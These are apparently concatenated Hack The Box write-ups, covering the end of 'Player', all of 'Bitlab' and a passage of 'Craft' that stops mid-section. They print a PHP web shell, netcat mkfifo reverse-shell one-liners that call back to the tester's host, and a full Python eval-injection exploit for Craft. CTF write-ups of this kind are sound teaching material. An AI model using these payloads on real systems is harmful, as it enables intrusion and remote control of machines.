staged-dev:x:4000000000:1001::/home/staged-dev:/bin/sh
#> 

I tried to use .writefile to write a php file and get a reverse shell but I couldn’t do that. But anyway I was finally able to read the user flag:


Credentials in fix.php –> RCE –> Shell as www-data

Earlier I couldn’t read fix.php through the ffmpeg exploit, I was able to read it as telegen and I found credentials for a user called peter:

#> .readfile /var/www/staging/fix.php                                    
DEBUG:__main__:auth_cookie: 'xxxx\nsource /var/www/staging/fix.php\n'          
DEBUG:__main__:dummy exec returned: None
INFO:__main__:<?php       
class                            
protected                                          
protected                                      
protected                                      
public                                       
return                                          
}
public
if($result
static::passed($test_name);
}
static::failed($test_name);
}
}
public
if($result
static::failed($test_name);
}
static::passed($test_name);
}
}
public
if(!$username){
$username
$password
}
//modified
//for
//fix
//peter
//CQXpm\z)G5D#%S$y=
}
public
if($result
static::passed($test_name);
}
static::failed($test_name);
}
}
public
echo
echo
echo
}
private
echo
static::$failed++;
}
private
static::character(".");
static::$passed++;
}
private
echo
static::$last_echoed
}
private
if(static::$last_echoed
echo
static::$last_echoed
}
}
#> 

These credentials (peter : CQXpm\z)G5D#%S$y=) worked with dev.player.htb:



I tried to create a new project in /var/www/html:


But I got an error saying that I was only allowed to create projects in /var/www/demo/home so I created a project there:


When I ran gobuster on http://dev.player.htb/ there was a directory called home:

root@kali:~/Desktop/HTB/boxes/player# gobuster dir -u http://dev.player.htb/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://dev.player.htb/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/01/17 20:18:00 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/components (Status: 301)
/data (Status: 301)
/favicon.ico (Status: 200)
/home (Status: 301)
/index.php (Status: 200)
/js (Status: 301)
/languages (Status: 301)
/lib (Status: 301)
/plugins (Status: 301)
/server-status (Status: 403)
/themes (Status: 301)
===============================================================
2020/01/17 20:19:49 Finished
===============================================================
root@kali:~/Desktop/HTB/boxes/player# 

I wanted to see if that was related to /var/www/demo/home so I created a file called test.php that echoed test and I tried to access it through /home:



It worked so I edited my test file and added the php-simple-backdoor code and got a reverse shell:



root@kali:~/Desktop/HTB/boxes/player# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.10.145] 56714
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@player:/var/www/demo/home$ ^Z
[1]+  Stopped                 nc -lvnp 1337
root@kali:~/Desktop/HTB/boxes/player# stty raw -echo
root@kali:~/Desktop/HTB/boxes/player# nc -lvnp 1337

www-data@player:/var/www/demo/home$ export TERM=screen
www-data@player:/var/www/demo/home$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@player:/var/www/demo/home$ 

Root Flag

when I ran pspy to monitor the processes I noticed that /var/lib/playbuff/buff.php got executed as root periodically:

2020/01/18 05:25:02 CMD: UID=0    PID=3650   | /usr/bin/php /var/lib/playbuff/buff.php 

I couldn’t write to it but it included another php file which I could write to (/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php):

www-data@player:/tmp$ cd /var/lib/playbuff/
www-data@player:/var/lib/playbuff$ cat buff.php 
<?php
include("/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php");
class playBuff
{
        public $logFile="/var/log/playbuff/logs.txt";
        public $logData="Updated";

        public function __wakeup()
        {
                file_put_contents(__DIR__."/".$this->logFile,$this->logData);
        }
}
$buff = new playBuff();
$serialbuff = serialize($buff);
$data = file_get_contents("/var/lib/playbuff/merge.log");
if(unserialize($data))
{
        $update = file_get_contents("/var/lib/playbuff/logs.txt");
        $query = mysqli_query($conn, "update stats set status='$update' where id=1");
        if($query)
        {
                echo 'Update Success with serialized logs!';
        }
}
else
{
        file_put_contents("/var/lib/playbuff/merge.log","no issues yet");
        $update = file_get_contents("/var/lib/playbuff/logs.txt");
        $query = mysqli_query($conn, "update stats set status='$update' where id=1");
        if($query)
        {
                echo 'Update Success!';
        }
}
?>
www-data@player:/var/lib/playbuff$ 

I put my reverse shell payload in /tmp and added a line to /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php that executed it:

www-data@player:/$ cat /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php
<?php
$servername = "localhost";
$username = "root";
$password = "";
$dbname = "integrity";

system("bash -c /tmp/pwned.sh");

// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}
?>
www-data@player:/$ cat /tmp/pwned.sh 
#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1338 >/tmp/f
www-data@player:/$ 




And we owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham
Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Bitlab
Next Hack The Box write-up : Hack The Box - AI

Hack The Box - Bitlab

By: 0xRick
11 January 2020 at 05:00

Hack The Box - Bitlab

Quick Summary

Hey guys, today Bitlab retired and here’s my write-up about it. It was a nice CTF-style machine that mainly had a direct file upload and a simple reverse engineering challenge. It’s a Linux box and its ip is 10.10.10.114, I added it to /etc/hosts as bitlab.htb. Let’s jump right in !




Nmap

As always we will start with nmap to scan for open ports and services:

root@kali:~/Desktop/HTB/boxes/bitlab# nmap -sV -sT -sC -o nmapinitial bitlab.htb 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-10 13:44 EST
Nmap scan report for bitlab.htb (10.10.10.114)
Host is up (0.14s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a2:3b:b0:dd:28:91:bf:e8:f9:30:82:31:23:2f:92:18 (RSA)
|   256 e6:3b:fb:b3:7f:9a:35:a8:bd:d0:27:7b:25:d4:ed:dc (ECDSA)
|_  256 c9:54:3d:91:01:78:03:ab:16:14:6b:cc:f0:b7:3a:55 (ED25519)
80/tcp open  http    nginx
| http-robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://bitlab.htb/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.56 seconds
root@kali:~/Desktop/HTB/boxes/bitlab# 

We got http on port 80 and ssh on port 22, robots.txt existed on the web server and it had a lot of entries.

Web Enumeration

Gitlab was running on the web server and we need credentials:


I checked /robots.txt to see if there was anything interesting:

root@kali:~/Desktop/HTB/boxes/bitlab# curl http://bitlab.htb/robots.txt                                                                                                                                                             [18/43]
# See http://www.robotstxt.org/robotstxt.html for documentation on how to use the robots.txt file                                                                                                                                          
#                                                                                                                                                                                                                                          
# To ban all spiders from the entire site uncomment the next two lines:                                                                                                                                                                    
# User-Agent: *                                                                                                                                                                                                                            
# Disallow: /                                                                                                                                                                                                                              
                                                                                                                                                                                                                                           
# Add a 1 second delay between successive requests to the same server, limits resources used by crawler                                                                                                                                    
# Only some crawlers respect this setting, e.g. Googlebot does not                                                                                                                                                                         
# Crawl-delay: 1                                                                                                                                                                                                                           
                                                                                                                                                                                                                                           
# Based on details in https://gitlab.com/gitlab-org/gitlab-ce/blob/master/config/routes.rb, https://gitlab.com/gitlab-org/gitlab-ce/blob/master/spec/routing, and using application                                                        
User-Agent: *                                                                                                                                                                                                                              
Disallow: /autocomplete/users                                                                                                                                                                                                              
Disallow: /search                                                                                                                                                                                                                          
Disallow: /api                                                                                                                                                                                                                             
Disallow: /admin                                                                                                                                                                                                                           
Disallow: /profile                                                                                                                                                                                                                         
Disallow: /dashboard                                                                                                                                                                                                                       
Disallow: /projects/new
Disallow: /groups/new
Disallow: /groups/*/edit
Disallow: /users
Disallow: /help
# Only specifically allow the Sign In page to avoid very ugly search results
Allow: /users/sign_in

# Global snippets
User-Agent: *
Disallow: /s/
Disallow: /snippets/new
Disallow: /snippets/*/edit
Disallow: /snippets/*/raw

# Project details
User-Agent: *
Disallow: /*/*.git
Disallow: /*/*/fork/new
Disallow: /*/*/repository/archive*
Disallow: /*/*/activity
Disallow: /*/*/new
Disallow: /*/*/edit
Disallow: /*/*/raw
Disallow: /*/*/blame
Disallow: /*/*/commits/*/*
Disallow: /*/*/commit/*.patch
Disallow: /*/*/commit/*.diff
Disallow: /*/*/compare
Disallow: /*/*/branches/new
Disallow: /*/*/tags/new
Disallow: /*/*/network
Disallow: /*/*/graphs
Disallow: /*/*/milestones/new
Disallow: /*/*/milestones/*/edit
Disallow: /*/*/issues/new
Disallow: /*/*/issues/*/edit
Disallow: /*/*/merge_requests/new
Disallow: /*/*/merge_requests/*.patch
Disallow: /*/*/merge_requests/*.diff
Disallow: /*/*/merge_requests/*/edit
Disallow: /*/*/merge_requests/*/diffs
Disallow: /*/*/project_members/import
Disallow: /*/*/labels/new
Disallow: /*/*/labels/*/edit
Disallow: /*/*/wikis/*/edit
Disallow: /*/*/snippets/new
Disallow: /*/*/snippets/*/edit
Disallow: /*/*/snippets/*/raw
Disallow: /*/*/deploy_keys
Disallow: /*/*/hooks
Disallow: /*/*/services
Disallow: /*/*/protected_branches
Disallow: /*/*/uploads/
Disallow: /*/-/group_members
Disallow: /*/project_members
root@kali:~/Desktop/HTB/boxes/bitlab#

Most of the disallowed entries were paths related to the Gitlab application. I checked /help and found a page called bookmarks.html:


There was an interesting link called Gitlab Login:


Clicking on that link didn’t result in anything, so I checked the source of the page, the href attribute had some javascript code:

        <DT><A HREF="javascript:(function(){ var _0x4b18=[&quot;\x76\x61\x6C\x75\x65&quot;,&quot;\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E&quot;,&quot;\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64&quot;,&quot;\x63\x6C\x61\x76\x65&quot;,&quot;\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64&quot;,&quot;\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78&quot;];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; })()" ADD_DATE="1554932142">Gitlab Login</A>

I took that code, edited it a little bit and used the js console to execute it:

root@kali:~/Desktop/HTB/boxes/bitlab# js
> var _0x4b18=['\x76\x61\x6C\x75\x65','\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E','\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64','\x63\x6C\x61\x76\x65','\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64','\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78'];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5];
Thrown:
ReferenceError: document is not defined
>

Then I printed the variable _0x4b18 which had the credentials for Gitlab:

> _0x4b18
[ 'value',
  'user_login',
  'getElementById',
  'clave',
  'user_password',
  '11des0081x' ]
> 

File Upload –> RCE –> Shell as www-data

After logging in with the credentials (clave : 11des0081x) I found two repositories, Profile and Deployer:



I also checked the snippets and I found an interesting code snippet that had the database credentials which will be useful later:



<?php
$db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles");
$result = pg_query($db_connection, "SELECT * FROM profiles");

Back to the repositories, I checked Profile and it was pretty empty:


The path /profile was one of the disallowed entries in /robots.txt, I wanted to check if that path was related to the repository, so I checked if the same image (developer.jpg) existed, and it did:



Now we can simply upload a php shell and access it through /profile, I uploaded the php-simple-backdoor:

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->







Then I merged it to the master branch:





I used the netcat openbsd reverse shell payload from PayloadsAllTheThings to get a shell, had to urlencode it first:

rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.xx.xx%201337%20%3E%2Ftmp%2Ff
root@kali:~/Desktop/HTB/boxes/bitlab# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.10.114] 44340
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@bitlab:/var/www/html/profile$ ^Z
[1]+  Stopped                 nc -lvnp 1337
root@kali:~/Desktop/HTB/boxes/bitlab# stty raw -echo
root@kali:~/Desktop/HTB/boxes/bitlab# nc -lvnp 1337

www-data@bitlab:/var/www/html/profile$ export TERM=screen
www-data@bitlab:/var/www/html/profile$ 

Database Access –> Clave’s Password –> SSH as Clave –> User Flag

After getting a shell as www-data I wanted to use the credentials I got earlier from the code snippet and see what was in the database, however psql wasn’t installed:

www-data@bitlab:/var/www/html/profile$ psql
bash: psql: command not found
www-data@bitlab:/var/www/html/profile$ 

So I had to do it with php:

www-data@bitlab:/var/www/html/profile$ php -a
Interactive mode enabled

php > $connection = new PDO('pgsql:host=localhost;dbname=profiles', 'profiles', 'profiles');

I executed the same query from the code snippet which queried everything from the table profiles, and I got clave’s password which I could use to get ssh access:

php > $result = $connection->query("SELECT * FROM profiles");
php > $profiles = $result->fetchAll();
php > print_r($profiles);
Array
(
    [0] => Array
        (
            [id] => 1
            [0] => 1
            [username] => clave
            [1] => clave
            [password] => c3NoLXN0cjBuZy1wQHNz==
            [2] => c3NoLXN0cjBuZy1wQHNz==
        )

)
php > 




We owned user.

Reversing RemoteConnection.exe –> Root’s Password –> SSH as Root –> Root Flag

In the home directory of clave there was a Windows executable called RemoteConnection.exe:

clave@bitlab:~$ ls -la
total 44
drwxr-xr-x 4 clave clave  4096 Aug  8 14:40 .
drwxr-xr-x 3 root  root   4096 Feb 28  2019 ..
lrwxrwxrwx 1 root  root      9 Feb 28  2019 .bash_history -> /dev/null
-rw-r--r-- 1 clave clave  3771 Feb 28  2019 .bashrc
drwx------ 2 clave clave  4096 Aug  8 14:40 .cache
drwx------ 3 clave clave  4096 Aug  8 14:40 .gnupg
-rw-r--r-- 1 clave clave   807 Feb 28  2019 .profile
-r-------- 1 clave clave 13824 Jul 30 19:58 RemoteConnection.exe
-r-------- 1 clave clave    33 Feb 28  2019 user.txt
clave@bitlab:~$ 

I downloaded it on my box:

root@kali:~/Desktop/HTB/boxes/bitlab# scp [email protected]:/home/clave/RemoteConnection.exe ./
[email protected]'s password: 
RemoteConnection.exe                                                                                                                                                                                     100%   14KB  16.5KB/s   00:00    
root@kali:~/Desktop/HTB/boxes/bitlab#

Then I started looking at the code decompilation with Ghidra. One function that caught my attention was FUN_00401520():


/* WARNING: Could not reconcile some variable overlaps */

void FUN_00401520(void)

{
  LPCWSTR pWVar1;
  undefined4 ***pppuVar2;
  LPCWSTR lpParameters;
  undefined4 ***pppuVar3;
  int **in_FS_OFFSET;
  uint in_stack_ffffff44;
  undefined4 *puVar4;
  uint uStack132;
  undefined *local_74;
  undefined *local_70;
  wchar_t *local_6c;
  void *local_68 [4];
  undefined4 local_58;
  uint local_54;
  void *local_4c [4];
  undefined4 local_3c;
  uint local_38;
  undefined4 ***local_30 [4];
  int local_20;
  uint local_1c;
  uint local_14;
  int *local_10;
  undefined *puStack12;
  undefined4 local_8;
  
  local_8 = 0xffffffff;
  puStack12 = &LAB_004028e0;
  local_10 = *in_FS_OFFSET;
  uStack132 = DAT_00404018 ^ (uint)&stack0xfffffffc;
  *(int ***)in_FS_OFFSET = &local_10;
  local_6c = (wchar_t *)0x4;
  local_14 = uStack132;
  GetUserNameW((LPWSTR)0x4,(LPDWORD)&local_6c);
  local_38 = 0xf;
  local_3c = 0;
  local_4c[0] = (void *)((uint)local_4c[0] & 0xffffff00);
  FUN_004018f0();
  local_8 = 0;
  FUN_00401260(local_68,local_4c);
  local_74 = &stack0xffffff60;
  local_8._0_1_ = 1;
  FUN_004018f0();
  local_70 = &stack0xffffff44;
  local_8._0_1_ = 2;
  puVar4 = (undefined4 *)(in_stack_ffffff44 & 0xffffff00);
  FUN_00401710(local_68);
  local_8._0_1_ = 1;
  FUN_00401040(puVar4);
  local_8 = CONCAT31(local_8._1_3_,3);
  lpParameters = (LPCWSTR)FUN_00401e6d();
  pppuVar3 = local_30[0];
  if (local_1c < 0x10) {
    pppuVar3 = local_30;
  }
  pWVar1 = lpParameters;
  pppuVar2 = local_30[0];
  if (local_1c < 0x10) {
    pppuVar2 = local_30;
  }
  while (pppuVar2 != (undefined4 ***)(local_20 + (int)pppuVar3)) {
    *pWVar1 = (short)*(char *)pppuVar2;
    pWVar1 = pWVar1 + 1;
    pppuVar2 = (undefined4 ***)((int)pppuVar2 + 1);
  }
  lpParameters[local_20] = L'\0';
  if (local_6c == L"clave") {
    ShellExecuteW((HWND)0x0,L"open",L"C:\\Program Files\\PuTTY\\putty.exe",lpParameters,(LPCWSTR)0x0
                  ,10);
  }
  else {
    FUN_00401c20((int *)cout_exref);
  }
  if (0xf < local_1c) {
    operator_delete(local_30[0]);
  }
  local_1c = 0xf;
  local_20 = 0;
  local_30[0] = (undefined4 ***)((uint)local_30[0] & 0xffffff00);
  if (0xf < local_54) {
    operator_delete(local_68[0]);
  }
  local_54 = 0xf;
  local_58 = 0;
  local_68[0] = (void *)((uint)local_68[0] & 0xffffff00);
  if (0xf < local_38) {
    operator_delete(local_4c[0]);
  }
  *in_FS_OFFSET = local_10;
  FUN_00401e78();
  return;
}

It looked like it was checking if the name of the user running the program was clave, then It executed PuTTY with some parameters that I couldn’t see:

if (local_6c == L"clave") {
    ShellExecuteW((HWND)0x0,L"open",L"C:\\Program Files\\PuTTY\\putty.exe",lpParameters,(LPCWSTR)0x0
                  ,10);
  }

This is how the same part looked like in IDA:


I copied the executable to a Windows machine and I tried to run it, however it just kept crashing.
I opened it in immunity debugger to find out what was happening, and I found an access violation:


It happened before reaching the function I’m interested in so I had to fix it. What I did was simply replacing the instructions that caused that access violation with NOPs.
I had to set a breakpoint before the cmp instruction, so I searched for the word “clave” in the referenced text strings and I followed it in the disassembler:




Then I executed the program and whenever I hit an access violation I replaced the instructions with NOPs, it happened twice then I reached my breakpoint:




After reaching the breakpoint I could see the parameters that the program gives to putty.exe in both eax and ebx, It was starting an ssh session as root and I could see the password:


EAX 00993E80 UNICODE "-ssh [email protected] -pw "Qf7]8YSV.wDNF*[7d?j&eD4^""
EBX 00993DA0 ASCII "-ssh [email protected] -pw "Qf7]8YSV.wDNF*[7d?j&eD4^""




And we owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Craft
Next Hack The Box write-up : Hack The Box - Player

Hack The Box - Craft

By: 0xRick
4 January 2020 at 05:00

Hack The Box - Craft

Quick Summary

Hey guys, today Craft retired and here’s my write-up about it. It’s a medium rated Linux box and its ip is 10.10.10.110, I added it to /etc/hosts as craft.htb. Let’s jump right in !




Nmap

As always we will start with nmap to scan for open ports and services:

root@kali:~/Desktop/HTB/boxes/craft# nmap -sV -sT -sC -o nmapinitial craft.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-03 13:41 EST
Nmap scan report for craft.htb (10.10.10.110)
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.4p1 Debian 10+deb9u5 (protocol 2.0)
| ssh-hostkey: 
|   2048 bd:e7:6c:22:81:7a:db:3e:c0:f0:73:1d:f3:af:77:65 (RSA)
|   256 82:b5:f9:d1:95:3b:6d:80:0f:35:91:86:2d:b3:d7:66 (ECDSA)
|_  256 28:3b:26:18:ec:df:b3:36:85:9c:27:54:8d:8c:e1:33 (ED25519)
443/tcp open  ssl/http nginx 1.15.8
|_http-server-header: nginx/1.15.8
|_http-title: About
| ssl-cert: Subject: commonName=craft.htb/organizationName=Craft/stateOrProvinceName=NY/countryName=US
| Not valid before: 2019-02-06T02:25:47
|_Not valid after:  2020-06-20T02:25:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.97 seconds
root@kali:~/Desktop/HTB/boxes/craft# 

We got https on port 443 and ssh on port 22.

Web Enumeration

The home page was kinda empty, Only the about info and nothing else:


The navigation bar had two external links, one of them was to https://api.craft.htb/api/ and the other one was to https://gogs.craft.htb:

<ul class="nav navbar-nav pull-right">
            <li><a href="https://api.craft.htb/api/">API</a></li>
            <li><a href="https://gogs.craft.htb/"><img border="0" alt="Git" src="/static/img/Git-Icon-Black.png" width="20" height="20"></a></li>
          </ul>

So I added both of api.craft.htb and gogs.craft.htb to /etc/hosts then I started checking them.
https://api.craft.htb/api:


Here we can see the API endpoints and how to interact with them.
We’re interested in the authentication part for now, there are two endpoints, /auth/check which checks the validity of an authorization token and /auth/login which creates an authorization token provided valid credentials.






We don’t have credentials to authenticate so let’s keep enumerating.
Obviously gogs.craft.htb had gogs running:


The repository of the API source code was publicly accessible so I took a look at the code and the commits.






Dinesh’s commits c414b16057 and 10e3ba4f0a had some interesting stuff. First one had some code additions to /brew/endpoints/brew.py where user’s input is being passed to eval() without filtering:


@@ -38,9 +38,13 @@ class BrewCollection(Resource):
         """
         Creates a new brew entry.
         """
-
-        create_brew(request.json)
-        return None, 201
+
+        # make sure the ABV value is sane.
+        if eval('%s > 1' % request.json['abv']):
+            return "ABV must be a decimal value less than 1.0", 400
+        else:
+            create_brew(request.json)
+            return None, 201
 @ns.route('/<int:id>')
 @api.response(404, 'Brew not found.')

I took a look at the API documentation again to find in which request I can send the abv parameter:


As you can see we can send a POST request to /brew and inject our payload in the parameter abv, However we still need an authorization token to be able to interact with /brew, and we don’t have any credentials.
The other commit was a test script which had hardcoded credentials, exactly what we need:


+response = requests.get('https://api.craft.htb/api/auth/login',  auth=('dinesh', '4aUh0A8PbVJxgd'), verify=False)
+json_response = json.loads(response.text)
+token =  json_response['token']
+
+headers = { 'X-Craft-API-Token': token, 'Content-Type': 'application/json'  }
+
+# make sure token is valid
+response = requests.get('https://api.craft.htb/api/auth/check', headers=headers, verify=False)
+print(response.text)
+

I tested the credentials and they were valid:



RCE –> Shell on Docker Container

I wrote a small script to authenticate, grab the token, exploit the vulnerability and spawn a shell.
exploit.py:

#!/usr/bin/python3 
import requests
import json
from subprocess import Popen
from sys import argv
from os import system

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

GREEN = "\033[32m"
YELLOW = "\033[93m" 

def get_token():
	req = requests.get('https://api.craft.htb/api/auth/login',  auth=('dinesh', '4aUh0A8PbVJxgd'), verify=False)
	response = req.json()
	token = response['token']
	return token

def exploit(token, ip, port):
	tmp = {}

	tmp['id'] = 0
	tmp['name'] = "pwned"
	tmp['brewer'] = "pwned"
	tmp['style'] = "pwned"
	tmp['abv'] = "__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f')".format(ip,port)

	payload = json.dumps(tmp)

	print(YELLOW + "[+] Starting listener on port {}".format(port))
	Popen(["nc","-lvnp",port])

	print(YELLOW + "[+] Sending payload")
	requests.post('https://api.craft.htb/api/brew/', headers={'X-Craft-API-Token': token, 'Content-Type': 'application/json'}, data=payload, verify=False)

if len(argv) != 3:
	print(YELLOW + "[!] Usage: {} [IP] [PORT]".format(argv[0]))
	exit()

ip = argv[1]
port = argv[2]
print(YELLOW + "[+] Authenticating")
token = get_token()
print(GREEN + "[*] Token: {}".format(token))
exploit(token, ip, port)




Turns out that the application was hosted on a docker container and I didn’t get a shell on the actual host.

/opt/app # cd /
/ # ls -la
total 64
drwxr-xr-x    1 root     root          4096 Feb 10  2019 .
drwxr-xr-x    1 root     root          4096 Feb 10  2019 ..
-rwxr-xr-x    1 root     root             0 Feb 10  2019 .dockerenv
drwxr-xr-x    1 root     root          4096 Jan  3 17:20 bin
drwxr-xr-x    5 root     root           340 Jan  3 14:58 dev
drwxr-xr-x    1 root     root          4096 Feb 10  2019 etc
drwxr-xr-x    2 root     root          4096 Jan 30  2019 home
drwxr-xr-x    1 root     root          4096 Feb  6  2019 lib
drwxr-xr-x    5 root     root          4096 Jan 30  2019 media
drwxr-xr-x    2 root     root          4096 Jan 30  2019 mnt
drwxr-xr-x    1 root     root          4096 Feb  9  2019 opt
dr-xr-xr-x  238 root     root             0 Jan  3 14:58 proc
drwx------    1 root     root          4096 Jan  3 15:16 root
drwxr-xr-x    2 root     root          4096 Jan 30  2019 run
drwxr-xr-x    2 root     root          4096 Jan 30  2019 sbin
drwxr-xr-x    2 root     root          4096 Jan 30  2019 srv
dr-xr-xr-x   13 root     root             0 Jan  3 14:58 sys
drwxrwxrwt    1 root     root          4096 Jan  3 17:26 tmp
drwxr-xr-x    1 root     root          4096 Feb  9  2019 usr
drwxr-xr-x    1 root     root          4096 Jan 30  2019 var
/ #

Gilfoyle’s Gogs Credentials –> SSH Key –> SSH as Gilfoyle –> User Flag

In /opt/app there was a python script called dbtest.py, It connects to the database and executes a SQL query:

/opt/app # ls -la
total 44
drwxr-xr-x    5 root     root          4096 Jan  3 17:28 .
drwxr-xr-x    1 root     root          4096 Feb  9  2019 ..
drwxr-xr-x    8 root     root          4096 Feb  8  2019 .git
-rw-r--r--    1 root     root            18 Feb  7  2019 .gitignore
-rw-r--r--    1 root     root          1585 Feb  7  2019 app.py
drwxr-xr-x    5 root     root          4096 Feb  7  2019 craft_api
-rwxr-xr-x    1 root     root           673 Feb  8  2019 dbtest.py
drwxr-xr-x    2 root     root          4096 Feb  7  2019 tests
/opt/app # cat dbtest.py
#!/usr/bin/env python

import pymysql
from craft_api import settings

# test connection to mysql database

connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
                             user=settings.MYSQL_DATABASE_USER,
                             password=settings.MYSQL_DATABASE_PASSWORD,
                             db=settings.MYSQL_DATABASE_DB,
                             cursorclass=pymysql.cursors.DictCursor)

try: 
    with connection.cursor() as cursor:
        sql = "SELECT `id`, `brewer`, `name`, `abv` FROM `brew` LIMIT 1"
        cursor.execute(sql)
        result = cursor.fetchone()
        print(result)

finally:
    connection.close()
/opt/app #

I copied the script and changed result = cursor.fetchone() to result = cursor.fetchall() and I changed the query to SHOW TABLES:

#!/usr/bin/env python

import pymysql
from craft_api import settings

# test connection to mysql database

connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
                             user=settings.MYSQL_DATABASE_USER,
                             password=settings.MYSQL_DATABASE_PASSWORD,
                             db=settings.MYSQL_DATABASE_DB,
                             cursorclass=pymysql.cursors.DictCursor)

try: 
    with connection.cursor() as cursor:
        sql = "SHOW TABLES"
        cursor.execute(sql)
        result = cursor.fetchall()
        print(result)

finally:
    connection.close()

There were two tables, user and brew:

/opt/app # wget http://10.10.xx.xx/db1.py
Connecting to 10.10.xx.xx (10.10.xx.xx:80)
db1.py               100% |********************************|   629  0:00:00 ETA

/opt/app # python db1.py
[{'Tables_in_craft': 'brew'}, {'Tables_in_craft': 'user'}]
/opt/app # rm db1.py
/opt/app #

I changed the query to SELECT * FROM user:

#!/usr/bin/env python

import pymysql
from craft_api import settings

# test connection to mysql database

connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
                             user=settings.MYSQL_DATABASE_USER,
                             password=settings.MYSQL_DATABASE_PASSWORD,
                             db=settings.MYSQL_DATABASE_DB,
                             cursorclass=pymysql.cursors.DictCursor)

try: 
    with connection.cursor() as cursor:
        sql = "SELECT * FROM user"
        cursor.execute(sql)
        result = cursor.fetchall()
        print(result)

finally:
    connection.close()

The table had all users credentials stored in plain text:

/opt/app # wget http://10.10.xx.xx/db2.py
Connecting to 10.10.xx.xx (10.10.xx.xx:80)
db2.py               100% |********************************|   636  0:00:00 ETA

/opt/app # python db2.py
[{'id': 1, 'username': 'dinesh', 'password': '4aUh0A8PbVJxgd'}, {'id': 4, 'username': 'ebachman', 'password': 'llJ77D8QFkLPQB'}, {'id': 5, 'username': 'gilfoyle', 'password': 'ZEU3N8WNM2rh4T'}]
/opt/app # rm db2.py
/opt/app #

Gilfoyle had a private repository called craft-infra:



He left his private ssh key in the repository:



When I tried to use the key it asked for password as it was encrypted, I tried his gogs password (ZEU3N8WNM2rh4T) and it worked:


We owned user.

Vault –> One-Time SSH Password –> SSH as root –> Root Flag

In Gilfoyle’s home directory there was a file called .vault-token:

